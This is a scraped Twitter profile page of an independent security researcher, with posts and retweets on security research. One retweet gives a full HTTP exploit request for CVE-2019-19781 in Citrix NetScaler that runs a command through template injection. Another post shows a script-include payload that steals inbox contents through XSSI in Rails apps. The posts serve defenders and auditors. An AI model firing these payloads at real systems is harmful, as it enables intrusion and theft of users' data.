Leandro Barragan

@lean0x2f

Independent Security Researcher/Consultant. Previously at ,

Vrijeme pridruživanja: studeni 2016.

Tweetovi

Blokirali ste korisnika/cu @lean0x2f

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @lean0x2f

  1. 30. sij

    BTW this is from , follow him for more amazing content :)

    Prikaži ovu nit
    Poništi
  2. 28. sij

    [Educational] One of the best blog posts that I ever read about going from 0 to unauth RCE in f**king Mikrotik OS step by step:

    Prikaži ovu nit
    Poništi
  3. proslijedio/la je Tweet
    6. velj 2015.

    Give a man an 0day and he'll have access for a day, teach a man to phish and he'll have access for life.

    Poništi
  4. proslijedio/la je Tweet
    22. sij

    I just published a ~45 page whitepaper on attacking and defending terraform infrastructure as code in GitHub. Includes attack scenarios, hardening, detections, etc. Deep thanks to and for their inspiration and research. ❤️ 1/3

    Prikaži ovu nit
    Poništi
  5. proslijedio/la je Tweet
    21. sij

    Apply for a position as a Senior Security Consultant with Immunity at our HQ in Miami, Florida or Arlington, Virginia.

    Poništi
  6. proslijedio/la je Tweet
    13. sij

    For team blue: Turns out CVE-2019-19781 doesn't need a traversal, beware. POST /vpns/portal/scripts/newbm.pl HTTP/1.1 Host: <target> NSC_USER: ../../../netscaler/portal/templates/si NSC_NONCE: 5 Content-Length: 53 url=a&title=[%+({'BLOCK'='print+`id`'})%]

    Poništi
  7. 12. pro 2019.

    Just include that js view on your site and you will get all the user's e-mails: <div id="messages" class="messages"></div><script src="https://victim/messages/inbox?format=js"></script>

    Prikaži ovu nit
    Poništi
  8. 12. pro 2019.

    For example, this is a template file that renders an application/javascript response with all the messages in the user's inbox: $("").html('<%=j render("messages") %>');

    Prikaži ovu nit
    Poništi
  9. 12. pro 2019.

    When auditing Ruby on Rails apps, always search for <name>.js.erb views files. There is a stupid pattern called "Server-generated JavaScript Responses" which is a way to bypass SOP and inject content via JavaScript files (just like JSONP) which leads to XSSI.

    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet

    Unpopular opinion: VDPs should not have any rewards of any kind -- no rep/kudos, no swag. Any reward just incentivizes people to hunt on them, devaluing hackers' time, especially new hackers. They should be pure "see something, say something".

    Poništi
  11. proslijedio/la je Tweet
    4. pro 2019.

    If you want to understand how this is possible, come tomorrow at Location: Room D Date: Thursday, December 5 | 10:45am-11:35am

    Poništi
  12. proslijedio/la je Tweet
    19. stu 2019.

    "I felt a great disturbance in the Force, as if millions of AWS SSRF vulnerabilities suddenly cried out in terror and were suddenly silenced. I fear something terrible has happened."

    Prikaži ovu nit
    Poništi
  13. proslijedio/la je Tweet
    18. lis 2019.

    A Tale of Exploitation in Spreadsheet File Conversions - Researching exploitation in headless document conversion in LibreOffice w/ , ,

    Poništi
  14. proslijedio/la je Tweet
    6. lis 2019.

    In Briefing will explain the state of the anti-cheat software market designed to protect gaming software and details various bypass techniques

    Poništi
  15. proslijedio/la je Tweet
    21. ruj 2019.

    When confronted with a coding problem, one programmer thought, 'I know, I'll use threads' - and then two he hd aerpoblms

    Poništi
  16. proslijedio/la je Tweet
    12. ruj 2019.

    Charlas 📣 La receta de y tiene todo para el éxito: hardware, firmware y estaño recién soldado 😋 . talks! 📣 This recipe has all it takes for success: hardware, firmware, and freshly welded pewter 😋 INFO 👉

    Poništi
  17. 31. srp 2019.

    Hey is this some kind of CTF?

    Poništi
  18. proslijedio/la je Tweet
    25. srp 2019.

    This honeypot system looks very popular right now, and ZoomEye's honeypot recognition service can cover this type.

    Poništi
  19. proslijedio/la je Tweet
    19. srp 2019.

    Nowadays you even need to be careful even with malicious monitors X) Nice Linux Kernel finding from based on QL results from and Report: Query:

    Poništi
  20. proslijedio/la je Tweet
    15. lip 2019.

    And I just merged 's code to exploit CVE-2019-1040 (MIC Remove) using . Great stuff!

    Prikaži ovu nit
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·